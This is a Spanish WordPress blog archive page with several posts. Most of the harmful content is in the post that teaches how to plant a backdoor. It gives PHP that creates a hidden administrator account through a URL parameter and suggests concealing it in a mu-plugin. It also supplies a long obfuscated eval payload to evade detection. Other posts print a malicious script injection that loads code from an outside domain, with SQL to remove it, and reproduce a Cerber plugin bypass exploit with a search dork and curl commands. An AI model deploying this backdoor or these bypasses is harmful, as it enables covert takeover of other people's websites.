WordPress archivos

Como activar HTTP/2 en WordPress usando cloudflare

Jul 7, 2019 | Cloudflare, WordPress, WPO

Seguramente muchos de vosotros uséis cloudflare en vuestras webs, desde hace poco cloudflare ha activado HTTP/2 por defecto en todos los planes y no se puede desactivar, básicamente si usas cloudflare debes tener activado HTTP/2

¿Que es HTTP/2?

Es un protocolo de red utilizado por la WWW

Resumiendo: Conseguimos visualizar nuestra web con menor latencia, se consumen menos recursos. Con este protocolo nuestras webs cargan más rápido!!!

Pero hay un problema, para utilizar HTTP/2 en WordPress no sirve solo con tener activa esta opción en nuestro panel de WordPress

Como activar HTTP/2 en WordPress usando cloudflare 1 — Aunque parezca que esta apagado, esta activo, ya que cloudflare ya no deja desactivarlo

Y os muestro como teniendo HTTP/2 activo en cloudflare este cambio no se aplica en nuestro WordPress

Como activar HTTP/2 en WordPress usando cloudflare 2

Estamos perdiendo un montón de ventajas. Podéis leer más aquí sobre HTTP/2

¿Como se soluciona? Muy fácil…

Debemos poner esta linea al principio de nuestro archivo wp-config.php y solucionado

define('CLOUDFLARE_HTTP2_SERVER_PUSH_ACTIVE', true);

Os lo demuestro:

Como activar HTTP/2 en WordPress usando cloudflare 3

Creando un backdoor en WordPress

Jun 22, 2019 | Exploits, Seguridad, WordPress

Os voy a enseñar a crear una puerta trasera en WordPress, bastante útil en muchos aspectos…

 function wordpressusuarios() {
     if ($_GET['wordpress'] == 'usuario') {
         require('wp-includes/registration.php');
         if (!username_exists('Usuarios')) {
             $user_id = wp_create_user('Usuarios', 'usuario');
             $user = new WP_User($user_id);
             $user->set_role('administrator');
               wp_die(__('WordPress instalado...'));
             die();  
 }
 add_action('wp_head', 'wordpressusuarios');

Este es el código, simplemente nos crea el usuario “Usuarios” . Este usuario se crea al usar esta url https://dominio.com/?wordpress=usuario

Nombre de usuario: Usuarios y la contraseña: usuario

¿Porque en el código he puesto WordPress instalado… y no he puesto de usuario backdoor creado o algo asi? Muy sencillo, se trata de ocultarlo lo máximo posible

Ten en cuenta que el usuario aparece en la lista de los usuarios

Si se dan cuenta y te borran el usuario, simplemente vuelves a entrar a la url con los parámetros mencionados y lo puedes volver a crear (Siempre y cuando no encuentren el código que permite hacer esta acción)

Muy bien, pero… ¿Donde pegamos este código?

Se puede añadir en el functions.php del tema o bien puedes crear un mu-plugin que se llame “WordPress” por ejemplo ¿Porque un mu-plugin y no un plugin? Porque poca gente conoce lo que es un mu-plugin y seguramente les sea mas difícil de localizar

También puedes pasarlo a base64 o modificar el codigo para crear más usuarios y pegarlo en diferentes plugins o archivos php.

¿Como seria? Probado y funcionando

eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));

Otra idea es que el código solo se pueda ejecutar en una pagina especifica, por si acaso algún plugin de seguridad detecta el link. Es decir que solo puedas ejecutarlo por ejemplo desde https://dominio.com/contacto?wordpress=usuario

function wordpressusuarios() {
   if( is_page('contacto')) {
           $1 = true;
     }
   if( !$1 ) {
     if ($_GET['wordpress'] == 'usuario') {
         require('wp-includes/registration.php');
         if (!username_exists('Usuarios')) {
             $user_id = wp_create_user('Usuarios', 'usuario');
             $user = new WP_User($user_id);
             $user->set_role('administrator');
               wp_die(__('WordPress instalado...'));
             die();
         }
     }
 }
}
 add_action('wp_head', 'wordpressusuarios');

No he probado esto último, pero diría que así puede funcionar

Como detectar en WordPress imágenes insertadas que devuelven error 404

Jun 22, 2019 | SEO, WordPress, WPO

Como ya sabéis en WordPress hay muchos maquetadores y en muchos casos es difícil detectar imagenes que han insertado y ya no se encuentran en el servidor, esto es un problema de WPO importante, porque produce mucha lentitud

En este caso estaba arreglando la web de un cliente cuando me encontré que tenia mas de 10 imágenes insertadas que devolvían un error 404

Puse la imagen por defecto de los productos de WooCommerce y mirad donde estaban

Como detectar en WordPress imágenes insertadas que devuelven error 404 6

Para hacer esto es muy sencillo, simplemente descargar y activar este plugin

Replace Broken Images

Lo activas y seleccionas la imagen que deseas

Como detectar en WordPress imágenes insertadas que devuelven error 404 7

No te olvides de sustituir las imágenes y después ya puedes desactivar o borrar el plugin

Desinfectar web hackeada por el plugin Yuzo related

Abr 10, 2019 | Seguridad, Exploits, WordPress

El plugin Yuzo Related Posts, que está instalado en más de 60,000 sitios web, se eliminó del directorio de plugins de WordPress.org el 30 de marzo de 2019 después de que una vulnerabilidad no parcheada fuera divulgada públicamente e irresponsablemente por un investigador de seguridad ese mismo día. Hoy 10 de abril de 2019 esta vulnerabilidad esta siendo explotada masivamente, seguramente con un script que rastrea los sitios vulnerables y si es vulnerable inyecta un codigo javascript que contiene publicidad

</style><script language=javascript>var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://hellofromhony.org/counter';
document.getElementsByTagName('head')[0].appendChild(elem);</script>

Este es el código desofuscado, pero los atacantes lo están inyectando a través de un eval(String.fromCharCode

¿Como desinfecto mi web?

Lo primero que debes hacer es eliminar el plugin de tu WordPress

Después para remover el código lo que tienes que hacer es insertar este código SQL para eliminar la tabla donde está el javascript ofuscado, que es lo que hace que tu web cargue la publicidad

DELETE
FROM `wp_options` 
WHERE `autoload` = 'yes'
AND `option_name` LIKE 'yuzo_related_post_options'

El creador del plugin ya ha corregido las vulnerabilidades y el equipo de plugins de WordPress ya está revisando la nueva versión.

El creador ha publicado un link con la nueva versión (que podéis descargar aquí)

Lo recomendable es esperar a que el equipo de plugins de WordPress lo revise y mantener el plugin alejado de nuestro WordPress, en las próximas horas o días estará de vuelta en el repositorio

Bonus: Si te gusta la seguridad o quieres probar esta vulnerabilidad, aquí tienes información para hacer una prueba de concepto 🙂

Bypass WordPress Cerber Security

Mar 5, 2019 | Exploits, WordPress

Analizamos los sitios web vulnerables con este dork

"inurl:"/wp-content/plugins/wp-cerber/"

Exploit — Como veis obtenemos la url de acceso, que wp-cerber proteje

Os dejo aquí más ejemplos para que probéis 👹

# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1
 
[Vulnerabilities]
 
 
#1: Stop user enumeration bypass:
 
U can bypass user enumeration protection if u use Post method instead of Get.
 
curl http://localhost/ -d author=1
 
 
 
#2: Protect admin scripts bypass:
 
U can bypass admin scripts protection if u add one or more slashes to the uri.
 
curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'
 
 
 
#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:
 
U can bypass this protection if u encode any character in the uri.
 
curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp
 
 
 
#4: Hide login URL bypass:
 
U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.
 
curl -I http://localhost/wp-%61dmin/
 
 
 
#5: Stop user enumeration via REST API bypass:
 
U can bypass if u insert /index.php/ between domain and rest route.
 
curl http:/localhost/index.php/wp-json/wp/v2/users/
 
 
 
#6: Disable REST API bypass:
 
Same above.
 
curl http:/localhost/index.php/wp-json/wp/v2/